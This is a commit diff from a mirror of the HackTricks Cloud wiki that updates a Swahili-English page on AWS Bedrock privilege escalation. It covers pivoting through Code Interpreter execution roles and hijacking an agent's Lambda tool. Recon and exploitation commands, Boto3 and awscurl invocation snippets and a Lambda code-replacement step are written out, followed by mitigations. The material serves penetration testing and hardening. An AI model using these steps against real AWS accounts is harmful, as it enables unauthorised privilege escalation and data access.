gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-privilege-escalat

Browse Source
This commit is contained in:
Translator
2026-04-21 08:21:04 +00:00
parent 2246efe952
commit ac50c0bc16
1 changed files with 96 additions and 27 deletions
Download Patch File Download Diff File Expand all files Collapse all files

123
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -6,32 +6,32 @@
### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter ni mazingira yaliyosimamiwa ya utekelezaji. **Custom Code Interpreters** zinaweza kusanidiwa na **`executionRoleArn`** ambayo "inatoa ruhusa kwa code interpreter kufikia huduma za AWS".
AgentCore Code Interpreter ni mazingira ya utekelezaji yanayosimamiwa. **Custom Code Interpreters** zinaweza kusanidiwa na **`executionRoleArn`** ambayo “hutoa permissions kwa code interpreter kufikia AWS services”.
Ikiwa **msemaji wa IAM mwenye ruhusa ndogo** anaweza **kuanza + kuita** kikao cha Code Interpreter kilichosanidiwa na **execution role yenye ruhusa zaidi**, mwito unaweza kwa ufanisi **pivot into the execution roles permissions** (lateral movement / privilege escalation kulingana na upeo wa role).
Ikiwa **lower-privileged IAM principal** anaweza **kianzisha + invoke** Code Interpreter session iliyosanidiwa na **more privileged execution role**, mwitaji anaweza kwa ufanisi **pivot** kwenda kwenye permissions za execution role hiyo (lateral movement / privilege escalation kutegemea scope ya role).
> [!NOTE]
> Hii kawaida ni suala la **misconfiguration / excessive permissions** (kutoa ruhusa kubwa kwa interpreter execution role na/au kutoa upatikanaji mpana wa invoke).
> AWS kwa wazi inaonya kuepuka privilege escalation kwa kuhakikisha execution roles zina **ruhusa sawa au chache** kuliko vitambulisho vinavyoruhusiwa kuita.
> Hii kwa kawaida ni suala la **misconfiguration / excessive permissions** (kutoa wide permissions kwa interpreter execution role na/au kutoa broad invoke access).
> AWS inaonya wazi kuepuka privilege escalation kwa kuhakikisha execution roles zina **equal or fewer** privileges kuliko identities zinazoruhusiwa ku-invoke.
#### Masharti ya awali (common misconfiguration)
#### Preconditions (common misconfiguration)
- A **custom code interpreter** inapatikana na **execution role** yenye ruhusa kupita kiasi (mfano: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
- Mtumiaji (developer/auditor/CI identity) ana ruhusa za:
- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Hiari) Mtumiaji pia anaweza kuunda interpreters: `bedrock-agentcore:CreateCodeInterpreter` (inawaruhusu kuunda interpreter mpya iliyosanidiwa na execution role, kulingana na org guardrails).
- Kuna **custom code interpreter** yenye over-privileged **execution role** (mfano: access kwa sensitive S3/Secrets/SSM au capabilities zinazofanana na IAM-admin).
- Mtumiaji (developer/auditor/CI identity) ana permissions za:
- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Optional) Mtumiaji pia anaweza create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (humruhusu kuunda interpreter mpya iliyosanidiwa na execution role, kutegemea guardrails za org).
#### Recon (identify custom interpreters and execution role usage)
List interpreters (control-plane) and inspect their configuration:
Orodhesha interpreters (control-plane) na kagua configuration yao:
```bash
aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
````
> Amri ya create-code-interpreter inaunga mkono `--execution-role-arn` ambayo inaeleza ruhusa za AWS ambazo mfasiri atakuwa nazo.
```
> Amri ya create-code-interpreter inasaidia `--execution-role-arn` ambayo inafafanua ni ruhusa gani za AWS ambazo interpreter itakuwa nazo.
#### Hatua 1 - Anzisha kikao (hii itarudisha `sessionId`, si interactive shell)
#### Hatua ya 1 - Anzisha session (hii inarudisha `sessionId`, si interactive shell)
```bash
SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
echo "SessionId: $SESSION_ID"
```
#### Hatua 2 - Waalike utekelezaji wa msimbo (Boto3 au signed HTTPS)
#### Hatua ya 2 - Invoke code execution (Boto3 or signed HTTPS)
Hakuna **shell ya python ya mwingiliano** kutoka `start-code-interpreter-session`. Utekelezaji hufanyika kupitia **InvokeCodeInterpreter**.
Hakuna **interactive python shell** kutoka `start-code-interpreter-session`. Execution hufanyika kupitia **InvokeCodeInterpreter**.
**Chaguo A - mfano wa Boto3 (tekeleza Python + thibitisha utambulisho):**
**Option A - Boto3 example (execute Python + verify identity):**
```python
import boto3
@@ -68,9 +68,9 @@ arguments={
for event in resp.get("stream", []):
print(event)
```
Iwapo interpreter imewekwa na execution role, matokeo ya `sts:GetCallerIdentity()` yanapaswa kuonyesha utambulisho wa role hiyo (si low-priv caller), ikionesha pivot.
Kama interpreter imewekwa na execution role, output ya `sts:GetCallerIdentity()` inapaswa kuonyesha identity ya role hiyo (si low-priv caller), ikionyesha pivot.
**Chaguo B - Mwito wa HTTPS uliosainiwa (awscurl):**
**Option B - Signed HTTPS call (awscurl):**
```bash
awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -87,18 +87,86 @@ awscurl -X POST \
}
}'
```
#### Impact
#### Athari
* **Lateral movement** kwa upatikanaji wowote wa AWS ambao interpreter execution role ina.
* **Privilege escalation** ikiwa interpreter execution role ina ruhusa zaidi kuliko caller.
* Kugundua kwa ugumu zaidi ikiwa CloudTrail data events kwa interpreter invocations hazijawezeshwa (invocations huenda zisirekodiwe kwa default, kulingana na usanidi).
* **Lateral movement** ndani ya yoyote AWS access ambayo interpreter execution role inayo.
* **Privilege escalation** ikiwa interpreter execution role ina privileges zaidi kuliko caller.
* Ugunduzi mgumu zaidi ikiwa CloudTrail data events kwa interpreter invocations hazijawezeshwa (invocations huenda zisirekodiwe kwa default, kutegemea configuration).
#### Mitigations / Hardening
* **Least privilege** kwa interpreter `executionRoleArn` (itendwe kama Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) na nani anayeweza kuanza sessions.
* Tumia **SCPs** kuzuia InvokeCodeInterpreter isipokuwa kwa approved agent runtime roles (inaweza kuwa muhimu kutekeleza ngazi ya org).
* Washa zinazofaa **CloudTrail data events** kwa AgentCore pale inapofaa; toa onyo juu ya invocations zisizotarajiwa na uundaji wa sessions.
* **Least privilege** kwenye interpreter `executionRoleArn` (itende kama Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) na nani anaweza kuanzisha sessions.
* Tumia **SCPs** kukataa InvokeCodeInterpreter isipokuwa kwa approved agent runtime roles (org-level enforcement inaweza kuwa ya lazima).
* Wezesha zinazofaa **CloudTrail data events** kwa AgentCore inapohitajika; toa alert kwa unexpected invocations na session creation.
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Bedrock Agents zinaweza kutumia **Lambda-backed action groups** kama tools (external execution). Ikiwa principal anaweza **modify code ya Lambda function inayotumiwa na agent**, na kisha akaweza **invoke agent**, anaweza ku-execute attacker-controlled code chini ya **Lambda execution role**.
> [!NOTE]
> Hii ni **cross-service trust abuse** (Bedrock → Lambda), si vulnerability. Attacker huenda asiweze ku-invoke Lambda moja kwa moja, lakini bado anaweza ku-trigger kupitia agent.
#### Preconditions (common misconfiguration)
- Kipo Bedrock Agent chenye **action group backed by a Lambda function**
- Attacker ana:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- Lambda execution role ina permissions pana zaidi kuliko attacker
- Attacker anaweza kutambua Lambda inayotumiwa na agent
#### Recon
Enumerate agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Kagua Lambda:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Utekelezaji
Badilisha code ya Lambda:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Mfano wa payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Tumia kupitia agent:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Athari
* **Privilege escalation** kwenda Lambda execution role
* **Data exfiltration** kutoka AWS services
* **Cross-service abuse** kupitia trusted agent execution
#### Mitigations
* **Restrict** `lambda:UpdateFunctionCode`
* Tumia Lambda roles za **least-privilege**
* **Monitor** mabadiliko ya Lambda code
* **Audit** matumizi ya Bedrock agent tool
## References
@@ -108,6 +176,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}}